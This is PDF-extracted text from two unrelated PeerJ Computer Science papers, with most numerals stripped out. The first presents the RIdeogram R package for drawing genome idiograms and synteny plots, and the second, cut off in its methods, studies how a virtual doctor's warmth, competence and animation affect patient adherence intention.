comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:gcyu @smu.edu.cn mailto:chenjh@njfu.edu.cn https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. species genome, such as gene and transposon distribution across the sunflower genome (badouin et al., ). an idiogram, also known as a karyotype, is defined as the phenotypic appearance of chromosomes in the nucleus of an eukaryotic cell and has been widely used to visualize the genome-wide data since the first web server, idiographica, came online in (kin & ono, ). there are dozens of tools have been developed for circular genome visualization with a perl language-based tool circos being the most used one (krzywinski et al., ; parveen, khurana & kumar, ). in contrast, there are not many alternatives for non- circular plots of whole genome information on idiograms. although few r packages, like genomegraphs (durinck et al., ), ggbio (yin, cook & lawrence, ), ideoviz (pai & ren, ), chromplot (orostica & verdugo, ) and chromdraw (janecka & lysak, ), and javascript libraries, like ideogram.js (weitz et al., ) and karyotypesvg (prlic, ), have been developed for non-circular genome visualization, they are either limited in several species and data visualization types or lacking the ample customization. recently, two r packages, karyoploter (gel & serra, ) and chromomap (anand, ), with strengthened capacities have been developed. however, one function that all these non-circular plots fail to achieve, as circos does, is to visualize the relationship between two or more species using bezier curves on idiograms. this function is very useful and allows to interpret genome-wide relationships more intuitively, especially in the visualization of whole genome duplication. indeed, circos is usually used to show syntenic blocks both in inter- and intraspecies genome comparisons using bezier curves (hu et al., ; wang et al., ). thus, there is a lack of a r package for non-circular genome visualization and allowing to visualize genome-wide relationships between two or more species using bezier curves on idiograms. scalable vector graphics (svg) is a language for describing two-dimensional graphics applications and images. svg graphics is defined in an extensible markup language (xml) text file which means that one can easily use any text editor or drawing software to create and edit svg graphics. most r graphics packages are built on two graphics systems, the traditional graphics system and the grid graphics system. here, we developed an r package (rideogram) to draw high-quality idiograms without species limitations, that allows to visualize and map whole-genome information on the idiograms based on the svg language. besides, rideogram can also be used to show the genome synteny with bezier curves linking the syntenic blocks on idiograms. description the package rideogram is written in r (r core team, ), one of the most popular programming languages widely used in statistical computing, data analytics and graphics. however, this new r graphics package is not built based on any existing graphics systems. we use the r environment to read the custom input files and calculate the drawing element positions in a coordinate system. then, we use r to write all element information into a text file following the xml format which are used to define graphics by the svg language. a list of the currently implemented commands is given in table . in general, there are three hao et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table functions contained in the package rideogram. function name description gffex extract information from a gff format genome annotation fill ideogram map and visualize the genome-wide data on the idiograms convertsvg convert the output file from the svg format to the format users chose svg tiff convert the output file from the svg format to the tiff format svg pdf convert the output file from the svg format to the pdf format svg jpg convert the output file from the svg format to the jpg format svg png convert the output file from the svg format to the png format main functions, gffex, ideogram and convertsvg implemented in the package rideogram. users can use the function data to load the example data or the basic r function read.table to load the custom data from local files. the function gffex can be used to extract the information from a gff format genome annotation file. then, the function ideogram can be used to compute the information for all drawing elements based on the input files and generate a a -sized svg file containing a vector graphic which can be conveniently viewed and modified using the software adobe illustrator or inkscape. alternatively, users can also use the function convertsvg to convert this svg file into an adjustable image format (pdf, png, tiff, or jpg) with a user-defined resolution according to the practical requirements. in general, there are two types of data, i.e., continuous and discrete data. for mapping and visualizing, rideogram considers the continuous data, such as gene density across the whole genome in -mb windows, as overlaid features and maps them on the idiograms with dark/light colors representing high/low values. for the other data type that are scattered throughout the whole genome, such as the chromosomal distribution of members in one gene family, rideogram can add track labels next to the idiograms with three shapes (box, circle and triangle) available to represent different characteristics of these members, such as the subclade that one gene member belongs to. users can also combine the shapes and colors to represent more than three distinct characteristic types. furthermore, users can also map the continuous data as a heatmap, a line or area chart along the idiograms. in addition, rideogram also provides functions for the visualization of dual and ternary genome synteny using bezier curves on the idiograms. rideogram is available through cran (https://cran.r-project.org/web/packages/ rideogram/) and is developed on github (https://github.com/tickingclock / rideogram). further extensions in development and fixes can be seen in the issue listing page on the package’s github page. the new function that we are planning to implement in next version include, but are not limited to, developing more types of data visualization along the idiograms, visualizing genome synteny for more species and enlarging the hao et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://cran.r-project.org/web/packages/rideogram/ https://cran.r-project.org/web/packages/rideogram/ https://github.com/tickingclock /rideogram https://github.com/tickingclock /rideogram http://dx.doi.org/ . /peerj-cs. user-specified genome regions to display detailed characteristics, as we gather more from users. examples our first example use the data contained in this package. after the completion of genome sequencing, assembly and annotation, rideogram can be used to give some idea of how genes are distributed across the whole genome. the example data contained numbers of protein-coding genes calculated in -mb windows which can be considered as continues data and positions of random selected non-coding rnas, including ribosomal rnas (rrnas), transfer rnas (trnas) and micrornas (mirnas), which can be considered as discrete data. rideogram maps the gene density information on the idiograms as overlaid features in a heat map and adds track labels next to the idiograms with green boxes, purple circles and orange triangles representing rrnas, trnas and mirnas, respectively (fig. ). obviously, inter- and intra-chromosomal gene distributions are non-uniform. for instance, the chromosomal regions adjacent to the centromeres are gene-poor in chromosome , and while those are gene-rich in chromosome , and . this function can be applied to many different situations, such as single nucleotide polymorphism (snp) density and candidate markers (fig. s & data s , original data see li et al., ), dna methylation dynamics and potential activated genes (fig. s & data s , original data see huang et al., ) and transcription factor (tf) binding sites and candidate target genes (fig. s & data s , original data see shamimuzzaman & vodkin, ). besides visualizing some specific genome characteristics across the whole genome at the chromosome level as showed in fig. , rideogram can also be used to compare two relevant genome features, such as gene and repeat density, which will provide some important implications for better understanding the relevance of chromosomal distribution patterns of these two features. the example data implemented in this package also contained the information of long terminal repeat (ltr) distribution across the human genome. since the transposable elements have been suggested to have a potential detrimental effect on gene expression (hollister & gaut, ), the distributions of gene and ltr are supposed to be opposite across the whole genome as a result of natural selection. as expect, the region that has a relatively high gene content usually has a relatively low ltr density and vice versa (fig. s ), indicating that ltr seems to avoid inserting in the regions with a high gene content in the genome. this similar phenomenon was also observed in the sunflower genome explained using two idiogram graphics, one showing the gene distribution and the other showing the ltr distribution (badouin et al., ). using rideogram, users can integrate these two graphics into one, much easier for researchers to interpret and readers to understand. apart from the differences, this function can also be used to show the similarities, like the similar genetic diversity patterns across the whole genome between two geographical groups of the same species, in different label types (fig. s & data s , fig. s , original data see chen et al., ). in addition, rideogram can also be used to show syntenic comparisons between two or three genomes. as shown in fig. , the syntenic blocks between each pair of species, hao et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. figure gene distribution across the whole human genome. the overlaid heatmap shows the gene density and the tack labels refer to random selected rnas consisted of rrnas (green boxes), trna (purple circles) and mirna (orange triangles) locus across the human genome. annotation information was downloaded from the gencode website (https://www.gencodegenes.org). full-size doi: . /peerjcs. /fig- which were identified using mcscan (tang et al., ), were plotted. particularly, a typical ancestral region in the basal angiosperm amborella can be tracked to up to two regions in liriodendron and to up to three regions in grape. based on the fact that no lineage-specific polyploidy event has been found in amborella and a whole-genome triplication has been detected in grape, it is reasonable to assume a single liriodendron lineage-specific whole genome duplication event (chen et al., ). furthermore, rideogram allows to visualize a dual genome comparison, such as the genome synteny between human and mouse (fig. s and data s ). compared to autosomes, the syntenic blocks between human and mouse x chromosomes occupy almost the entirety of each x chromosome, suggesting a highly conserved syntenic relationship of the x chromosome within the eutherian mammalian lineage (ross et al., ). hao et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.gencodegenes.org https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. figure syntenic comparison of three plant genomes. genome synteny patterns show that a typical an- cestral region in the basal angiosperm amborella can be tracked to up to two regions in liriodendron and to up to three regions in grape. gray wedges in the background highlight major syntenic blocks spanning more than genes between the genomes (highlighted by one syntenic set shown in colored). full-size doi: . /peerjcs. /fig- conclusion the rideogram package provides an efficient and effective way to build idiograms with no species limitations and map genome-wide information on the idiograms for better visualizing and understanding the chromosomal distribution patterns of some particular genomic features. meanwhile, this package can be also used to visualize syntenic analysis between genomes. additionally, it is user-friendly and accessible for biologists without extensive computer programming expertise. finally, rideogram can generate two types of images, a vector graphic or a bitmap file, both in high-quality and meeting conventional requirements for direct use in presentations or journal publications. hao et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. acknowledgements we thank dr. zhongjuan zhang for her comments on the manuscript. additional information and declarations funding this work was supported by the key research and development plan of jiangsu province (be ), the foundation of jiangsu forestry bureau (lykj[ ] ), the qinglan project of jiangsu province and the priority academic program development of jiangsu higher education institutions (papd). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: key research and development plan of jiangsu province: be . foundation of jiangsu forestry bureau: lykj[ ] . qinglan project of jiangsu province. priority academic program development of jiangsu higher education institutions (papd). competing interests the authors declare there are no competing interests. author contributions • zhaodong hao conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • dekang lv performed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. • ying ge performed the experiments, performed the computation work, authored or reviewed drafts of the paper, typeset the code, and approved the final draft. • jisen shi and dolf weijers performed the experiments, authored or reviewed drafts of the paper, and approved the final draft. • guangchuang yu and jinhui chen conceived and designed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: data and codes are available at github: https://github.com/tickingclock / rideogram. hao et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/tickingclock /rideogram https://github.com/tickingclock /rideogram http://dx.doi.org/ . /peerj-cs. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references anand l. . chromomap: interactive visualization and mapping of chromosomes. biorxiv doi . / . badouin h, gouzy j, grassa cj, murat f, staton se, cottret l, lelandais-briere c, owens gl, carrere s, mayjonade b, legrand l, gill n, kane nc, bowers je, hubner s, bellec a, berard a, berges h, blanchet n, boniface mc, brunel d, catrice o, chaidir n, claudel c, donnadieu c, faraut t, fievet g, helmstetter n, king m, knapp sj, lai z, le paslier mc, lippi y, lorenzon l, mandel jr, marage g, marchand g, marquand e, bret-mestries e, morien e, nambeesan s, nguyen t, pegot-espagnet p, pouilly n, raftis f, sallet e, schiex t, thomas j, vandecasteele c, vares d, vear f, vautrin s, crespi m, mangin b, burke jm, salse j, munos s, vincourt p, rieseberg lh, langlade nb. . the sunflower genome provides insights into oil metabolism, flowering and asterid evolution. nature : – doi . /nature . cao h, hastie ar, cao d, lam et, sun y, huang h, liu x, lin l, andrews w, chan s, huang s, tong x, requa m, anantharaman t, krogh a, yang h, cao h, xu x. . rapid detection of structural variation in a human genome us- ing nanochannel-based genome mapping technology. gigascience :article doi . / - x- - . chen j, hao z, guang x, zhao c, wang p, xue l, zhu q, yang l, sheng y, zhou y, xu h, xie h, long x, zhang j, wang z, shi m, lu y, liu s, guan l, zhu q, yang l, ge s, cheng t, laux t, gao q, peng y, liu n, yang s, shi j. . liriodendron genome sheds light on angiosperm phylogeny and species-pair differentiation. nature plants : – doi . /s - - - . dekker j, rippe k, dekker m, kleckner n. . capturing chromosome conformation. science : – doi . /science. . durinck s, bullard j, spellman pt, dudoit s. . genomegraphs: integrated genomic data visualization with r. bmc bioinformatics : doi . / - - - . eid j, fehr a, gray j, luong k, lyle j, otto g, peluso p, rank d, baybayan p, bettman b, bibillo a, bjornson k, chaudhuri b, christians f, cicero r, clark s, dalal r, dewinter a, dixon j, foquet m, gaertner a, hardenbol p, heiner c, hester k, holden d, kearns g, kong x, kuse r, lacroix y, lin s, lundquist p, ma c, marks p, maxham m, murphy d, park i, pham t, phillips m, roy j, sebra r, shen g, sorenson j, tomaney a, travers k, trulson m, vieceli j, wegener j, wu d, yang a, zaccarin d, zhao p, zhong f, korlach j, turner s. . real- time dna sequencing from single polymerase molecules. science : – doi . /science. . hao et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / http://dx.doi.org/ . /nature http://dx.doi.org/ . / - x- - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /science. http://dx.doi.org/ . / - - - http://dx.doi.org/ . /science. http://dx.doi.org/ . /peerj-cs. gel b, serra e. . karyoploter: an r/bioconductor package to plot customizable genomes displaying arbitrary data. bioinformatics : – doi . /bioinformatics/btx . hollister jd, gaut bs. . epigenetic silencing of transposable elements: a trade- off between reduced transposition and deleterious effects on neighboring gene expression. genome research : – doi . /gr. . . hu l, xu z, wang m, fan r, yuan d, wu b, wu h, qin x, yan l, tan l, sim s, li w, saski ca, daniell h, wendel jf, lindsey k, zhang x, hao c, jin s. . the chromosome-scale reference genome of black pepper provides insight into piperine biosynthesis. nature communications :article doi . /s - - - . huang h, liu r, niu q, tang k, zhang b, zhang h, chen k, zhu jk, lang z. . global increase in dna methylation during orange fruit development and ripening. proceedings of the national academy of sciences of the united states of america : – doi . /pnas. . janecka j, lysak ma. . chromdraw: an r package for visualization of linear and cir- cular karyotypes. chromosome research : – doi . /s - - - . jiao wb, schneeberger k. . the impact of third generation genomic technolo- gies on plant genome assembly. current opinion in plant biology : – doi . /j.pbi. . . . kin t, ono y. . idiographica: a general-purpose web application to build id- iograms on-demand for human, mouse and rat. bioinformatics : – doi . /bioinformatics/btm . krzywinski m, schein j, birol i, connors j, gascoyne r, horsman d, jones sj, marra ma. . circos: an information aesthetic for comparative genomics. genome research : – doi . /gr. . . laver t, harrison j, o’neill pa, moore k, farbos a, paszkiewicz k, studholme dj. . assessing the performance of the oxford nanopore technologies minion. biomolecular detection and quantification : – doi . /j.bdq. . . . li x, singh j, qin m, li s, zhang x, zhang m, khan a, zhang s, wu j. . devel- opment of an integrated k snp genotyping array and application for genetic mapping, genome assembly improvement and genome wide association studies in pear (pyrus). plant biotechnology journal : – doi . /pbi. . orostica ky, verdugo ra. . chromplot: visualization of genomic data in chromoso- mal context. bioinformatics : – doi . /bioinformatics/btw . pai s, ren j. . ideoviz: plots data (continuous/discrete) along chromosomal ideogram. r package version . . . parveen a, khurana s, kumar a. . overview of genomic tools for circular visual- ization in the next-generation genomic sequencing era. current genomics : – doi . / . phillippy am. . new advances in sequence assembly. genome research :xi–xiii doi . /gr. . . hao et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /bioinformatics/btx http://dx.doi.org/ . /gr. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.pbi. . . http://dx.doi.org/ . /bioinformatics/btm http://dx.doi.org/ . /gr. . http://dx.doi.org/ . /j.bdq. . . http://dx.doi.org/ . /pbi. http://dx.doi.org/ . /bioinformatics/btw http://dx.doi.org/ . / http://dx.doi.org/ . /gr. . http://dx.doi.org/ . /peerj-cs. prlic a. . karyotypesvg—svg based ideograms of chromosomes showing cytogenetic bands. version . . . available at https://github.com/andreasprlic/ karyotypesvg. r core team. . r: a language and environment for statistical computing. vienna: r foundation for statistical computing. available at https://www.r-project.org/ . ross mt, grafham dv, coffey aj, scherer s, mclay k, muzny d, platzer m, howell gr, burrows c, bird cp, frankish a, lovell fl, howe kl, ashurst jl, fulton rs, sudbrak r, wen gp, jones mc, hurles me, andrews td, scott ce, searle s, ramser j, whittaker a, deadman r, carter np, hunt se, chen r, cree a, gunaratne p, havlak p, hodgson a, metzker ml, richards s, scott g, steffen d, sodergren e, wheeler da, worley kc, ainscough r, ambrose kd, ansari-lari ma, aradhya s, ashwell ris, babbage ak, bagguley cl, ballabio a, banerjee r, barker ge, barlow kf, barrett ip, bates kn, beare dm, beasley h, beasley o, beck a, bethel g, blechschmidt k, brady n, bray-allen s, bridgeman am, brown aj, brown mj, bonnin d, bruford ea, buhay c, burch p, burford d, burgess j, burrill w, burton j, bye jm, carder c, carrel l, chako j, chapman jc, chavez d, chen e, chen g, chen y, chen zj, chinault c, ciccodicola a, clark sy, clarke g, clee cm, clegg s, clerc-blankenburg k, clifford k, cobley v, cole cg, conquer js, corby n, connor re, david r, davies j, davis c, davis j, delgado o, deshazo d, dhami p, ding y, dinh h, dodsworth s, draper h, dugan-rocha s, dunham a, dunn m, durbin kj, dutta i, eades t, ellwood m, emery-cohen a, errington h, evans kl, faulkner l, francis f, frankland j, fraser ae, galgoczy p, gilbert j, gill r, glockner g, gregory sg, gribble s, griffiths c, grocock r, gu yh, gwilliam r, hamilton c, hart ea, hawes a, heath pd, heitmann k, hennig s, hernandez j, hinzmann b, ho s, hoffs m, howden pj, huckle ej, hume j, hunt pj, hunt ar, isherwood j, jacob l, johnson d, jones s, jong pjde, joseph ss, keenan s, kelly s, kershaw jk, khan z, kioschis p, klages s, knights aj, kosiura a, kovar-smith c, laird gk, langford c, lawlor s, leversha m, lewis l, liu w, lloyd c, lloyd dm, loulseged h, loveland je, lovell jd, lozado r, lu j, lyne r, ma j, maheshwari m, matthews lh, mcdowall j, mclaren s, mcmurray a, meidl p, meitinger t, milne s, miner g, mistry sl, morgan m, morris s, muller i, mullikin jc, nguyen n, nordsiek g, nyakatura g, o’dell cn, okwuonu g, palmer s, pandian r, parker d, parrish j, pasternak s, patel d, pearce av, pearson dm, pelan se, perez l, porter km, ramsey y, reichwald k, rhodes s, ridler ka, schlessinger d, schueler mg, sehra hk, shaw-smith c, shen h, sheridan em, shownkeen r, skuce cd, smith ml, sotheran ec, steingruber he, steward ca, storey r, swann rm, swarbreck d, tabor pe, taudien s, taylor t, teague b, thomas k, thorpe a, timms k, tracey a, trevanion s, tromans ac, d’urso m, verduzco d, villasana d, waldron l, wall m, wang qy, warren j, warry gl, wei xh, west a, whitehead sl, whiteley mn, wilkinson je, willey dl, williams g, williams l, williamson a, williamson h, wilming l, woodmansey rl, wray pw, yen j, zhang jk, zhou jl, zoghbi h, zorilla s, buck d, reinhardt r, poustka a, rosenthal a, lehrach h, meindl a, minx pj, hillier lw, willard hf, wilson rk, waterston rh, rice cm, hao et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/andreasprlic/karyotypesvg https://github.com/andreasprlic/karyotypesvg https://www.r-project.org/ http://dx.doi.org/ . /peerj-cs. vaudin m, coulson a, nelson dl, weinstock g, sulston je, durbin r, hubbard t, gibbs ra, beck s, rogers j, bentley dr. . the dna sequence of the human x chromosome. nature : – doi . /nature . shamimuzzaman m, vodkin l. . genome-wide identification of binding sites for nac and yabby transcription factors and co-regulated genes during soy- bean seedling development by chip-seq and rna-seq. bmc genomics : doi . / - - - . tang hb, wang xy, bowers je, ming r, alam m, paterson ah. . unraveling ancient hexaploidy through multiply-aligned angiosperm gene maps. genome research : – doi . /gr. . . wang m, tu l, yuan d, zhu , shen c, li j, liu f, pei l, wang p, zhao g, ye z, huang h, yan f, ma y, zhang l, liu m, you j, yang y, liu z, huang f, li b, qiu p, zhang q, zhu l, jin s, yang x, min l, li g, chen ll, zheng h, lindsey k, lin z, udall ja, zhang x. . reference genome sequences of two cultivated allotetraploid cottons. gossypium hirsutum and gossypium barbadense. nature genetics : – doi . /s - - -x. weitz em, pantano l, zhu j, upton b, busby b. . viewing rna-seq data on the entire human genome. f res :article doi . /f research. . . yin tf, cook d, lawrence m. . ggbio: an r package for extending the grammar of graphics for genomic data. genome biology :r doi . /gb- - - -r . hao et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /nature http://dx.doi.org/ . / - - - http://dx.doi.org/ . /gr. . http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /f research. . http://dx.doi.org/ . /gb- - - -r http://dx.doi.org/ . /peerj-cs. the doctor’s digital double: how warmth, competence, and animation promote adherence intention the doctor’s digital double: how warmth, competence, and animation promote adherence intention zhengyan dai* and karl f. macdorman* school of informatics and computing, indiana university, indianapolis, in, usa * these authors contributed equally to this work. abstract background: each year, patient nonadherence to treatment advice costs the us healthcare system more than $ billion and results in , deaths. developing virtual consultations to promote adherence could improve public health while cutting healthcare costs and usage. however, inconsistencies in the realism of computer-animated humans may cause them to appear eerie, a phenomenon termed the uncanny valley. eeriness could reduce a virtual doctor’s credibility and patients’ adherence. methods: in a � � between-groups posttest-only experiment, participants played the role of a patient in a hypothetical virtual consultation with a doctor. the consultation varied in the doctor’s character (good or poor bedside manner), outcome (received a fellowship or sued for malpractice), and depiction (a recorded video of a real human actor or of his d computer-animated double). character, outcome, and depiction were designed to manipulate the doctor’s level of warmth, competence, and realism, respectively. results: warmth and competence increased adherence intention and consultation enjoyment, but realism did not. on the contrary, the computer-animated doctor increased adherence intention and consultation enjoyment significantly more than the doctor portrayed by a human actor. we propose that enjoyment of the animated consultation caused the doctor to appear warmer and more real, compensating for his realism inconsistency. expressed as a path model, this explanation fit the data. discussion: the acceptance and effectiveness of the animation should encourage the development of virtual consultations, which have advantages over creating content with human actors including ease of scenario revision, internationalization, localization, personalization, and web distribution. subjects human-computer interaction, agents and multi-agent systems, graphics, multimedia, social computing keywords adherence, anthropomorphism, avatars, computer animation, doctor–patient simulations, health literacy, interactive narratives, uncanny valley introduction the persuasiveness of a message depends on its source, content, and the extent to which it is processed systematically or heuristically (chaiken, ; van der heide & schumaker, ). systematic processing assesses the content of a message, while heuristic processing assesses features unrelated to content. when the message source is another human, features affecting persuasion include physical appearance, perceived character traits, how to cite this article dai z, macdorman kf. . the doctor’s digital double: how warmth, competence, and animation promote adherence intention. peerj comput. sci. :e doi . /peerj-cs. submitted august accepted september published november corresponding author karl f. macdorman, kmacdorm@indiana.edu academic editor julita vassileva additional information and declarations can be found on page doi . /peerj-cs. copyright dai and macdorman distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:kmacdorm@�indiana.�edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ and behavior (wood, solomon & englis, ). for character traits, the primary dimension of interpersonal perception is warmth, and the secondary dimension is competence (cuddy, fiske & glick, ; fiske et al., ). warmth indicates the intention to help or harm others and competence indicates the capacity to do so (fiske, cuddy & glick, ). competence and facets of warmth, like goodwill and trustworthiness, have been used extensively to assess source credibility (mccroskey & teven, ; mcginnies & ward, ); they are important in the literature on persuasion because credible sources are more persuasive (jain & posavac, ; maddux & rogers, ; pornpitakpan, ; sertoglu, catl & korkmaz, ). persuasive strategies that increase perceived warmth and competence have been investigated in doctor–patient consultations (cousin, mast & jaunin-stalder, ; janssen & lagro-janssen, ). patients’ perception of their doctor’s warmth and competence increases adherence, that is, clinically unsupervised compliance with treatment advice. communication strategies that express warmth increase patients’ perception of their doctor as caring, understanding, and empathy; thus, patients prefer these strategies (cousin et al., ; mast, hall & roter, ; o’hair, ; o’hair et al., ). the perception of a doctor’s empathy and competence (which includes expertise) increases the patients’ satisfaction with and adherence to treatment advice (kim, kaplowitz & johnston, ; ohana & mash, ; willson & mcnamara, ). while satisfaction with communication increases adherence, dissatisfaction has the opposite effect (burgoon et al., ; marple et al., ). warmth and competence improve the patents’ prognosis and quality of life by increasing adherence (bennett et al., ; borel et al., ; swain et al., ). warmth, competence, attractiveness, and other factors affecting source credibility apply to virtual as well as real humans (garau et al., ; keeling, mcgoldrick & beatty, ). virtual humans offer a familiar interface that can be used to change people’s beliefs, attitudes, intentions, and behaviors (jin & sung, ; peña & yoo, ) while disseminating professional advice. along with the content of a message, virtual humans deliver nonverbal cues about warmth and competence (an et al., ; anam, andrade & ruiz, ; tongpeth, du & clark, ). these cues reduce the receiver’s uncertainty during communication and support decision-making (burgoon & hale, ; burgoon & walther, ). a virtual human’s nonverbal cues enable the experience of social presence, relatedness, and affinity (bente et al., )—an experience that precedes interpersonal trust (cyr et al., ). although both real and virtual humans vary in form, behavior, and interactivity, virtual humans also vary in human realism (bailenson et al., ). designing perfectly or even consistently realistic virtual humans is an unsolved challenge (chattopadhyay & macdorman, ; gilbert & forney, ). we assume that all present-day virtual humans are realism inconsistent because the goal of realism is human indistinguishability, and its degree of attainment will vary depending on the difficulty of making each feature indistinguishable. features that have been experimentally contrasted in realism include face and eyes (macdorman et al., ; seyama & nagayama, ) and voice and body (mitchell et al., ). a literature review concluded features that are inconsistent dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in their realism elicit feelings of eeriness (kätsyri et al., ), a phenomenon known as the uncanny valley (mathur & reichling, ; moore, ; mori ). eeriness could function like other negative evaluations to reduce source credibility. thus, a fundamental problem with virtual humans is that while delivering intended warmth and competence cues, they also deliver unintended cues about inconsistent realism (chattopadhyay & macdorman, ). these unintended cues may negate the positive effects of warmth and competence cues on persuasion. specifically, a virtual doctor’s realism and potential for eeriness might affect a patient’s intention to adhere to treatment advice by influencing the virtual doctor’s persuasiveness relative to a real human. as this topic has not been studied empirically, the present study is intended to fill this gap. despite their differences, a virtual human could be as persuasive as a real human (patel & macdorman, ; zanbaka, goolkasian & hodges, )—or even more persuasive (bickmore, pfeifer & paasche-orlow, ). however, raij et al. ( ) found that a virtual patient induced less empathy and rapport-building and worse attitudes in doctors than a real patient. although these studies investigated the effect of realism on persuasion, only one employed an experimentally controlled stimulus, that is, a digital double (patel & macdorman, ). moreover, the ways in which warmth, competence, realism, and eeriness together affect adherence intention in a hypothetical virtual consultation have not been investigated. based on the finding that warmth, including its goodwill and trustworthiness facets, and competence increase a source’s persuasiveness in both real and virtual environments, we hypothesized that (h ) a high-warmth source will be more persuasive than a low-warmth source and (h ) a high-competence source will be more persuasive than a low-competence source. in the virtual consultation, the high-warmth source was portrayed as a doctor with good bedside manner and the low-warmth source was portrayed as a doctor with poor bedside manner; the high-competence source was portrayed as a doctor who would at the end of the consultation receive a fellowship and the low-competence source was portrayed as a doctor who would instead be sued for malpractice (videos: doi . /m .figshare. ). in research on how physical appearance influences persuasion, attractiveness has been the most widely investigated dimension. attractiveness increases persuasiveness (chaiken, ; holzwarth, janiszewski & neumann, ; jin & bolebruch, ; joseph, ; khan & sutcliffe, ; lacrosse, ; pallak, ; pallak, murroni & koch, ), though with exceptions (skalski & tamborini, ). we would expect inconsistent realism and eeriness to have the opposite effect. nevertheless, patel & macdorman ( ) found that although an animated character was more eerie, less attractive, and less human than its real counterpart, it did not reduce the intention to comply with advice. based on the assumption that flaws in realism cause negative affective evaluations, namely, eeriness that decreases source credibility, we hypothesized that (h ) a high-realism source will be more persuasive than a low-realism source. in the virtual consultation, the high-realism source was the doctor depicted by a real human actor and the low-realism source was the doctor depicted by the actor’s computer-animated double (fig. ). dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / https://doi.org/ . /m .figshare. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the future success of virtual consultations depends on patients’ willingness to accept this new technology. to this end, our study also aims to investigate the ways in which the message source’s warmth, competence, and realism influence the enjoyment of the virtual consultation. smiling and other nonverbal cues indicating warmth and social presence have been found to increase enjoyment and trust when interacting with virtual human characters (guadagno, swinth & blascovich, ; qiu & benbasat, ). whether virtual or real, given that a doctor’s warmth and competence increase patient satisfaction (kim, kaplowitz & johnston, ; ohana & mash, ; willson & mcnamara, ), we hypothesized that the consultation will be more enjoyable (h ) with the high-warmth source than with the low-warmth source and (h ) with the high-competence source than with the low-competence source. computer animation can often be more enjoyable than reality. for example, virtual human characters can increase satisfaction more than real people (bickmore, pfeifer & paasche-orlow, ). however, the characters tested were typically less realistic than the human model employed in this study and thus—according to mori ( ) uncanny valley hypothesis—were less likely to appear eerie. nevertheless, animation realism can depiction c h ar ac te r low realism high realism h ig h w ar m th lo w w ar m th figure the real human actor and his digital double used in the experiment. in the role of a patient in a hypothetical virtual consultation, the participant interacted with a doctor. a � � between- groups posttest-only experimental design was used. the doctor’s character was good or poor bedside manner, outcome was received a fellowship or sued for malpractice, and depiction was a recorded video of a real human actor or of his d computer-animated double. character, outcome, and depiction were designed to manipulate the doctor’s level of warmth, competence, and realism, respectively. full-size doi: . /peerj-cs. /fig- dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ increase a virtual character’s appeal and even uncanniness can elicit positive affect as exhibited by facial expressions and self-reports (kokkinara & mcdonnell, ; mäkäräinen et al., ). leaving open the direction of the effect, we hypothesized that (h ) realism will influence the enjoyment of the virtual consultation. methods the experiment was set up as a web-based interactive visual narrative. participants playing as patient selected responses to a video of a dramatic character playing as doctor in a hypothetical virtual consultation. the doctor’s bedside manner, personal outcome, and depiction were manipulated to examine whether warmth, competence, and realism, respectively, increase adherence intention and enjoyment; and whether eeriness decreases adherence intention and enjoyment. warmth was manipulated based on the scripted narrative through the doctor’s spoken words, voice and prosody, facial expressions, and body movements. competence was manipulated through a subplot culminating in the doctor being either honored with a fellowship or sued for malpractice. realism was manipulated by using a recorded video of either a real actor playing the doctor in a consultation room or computer-animated models simulating the same scenario. participant characteristics and sampling the sample was comprised of randomly selected undergraduate and 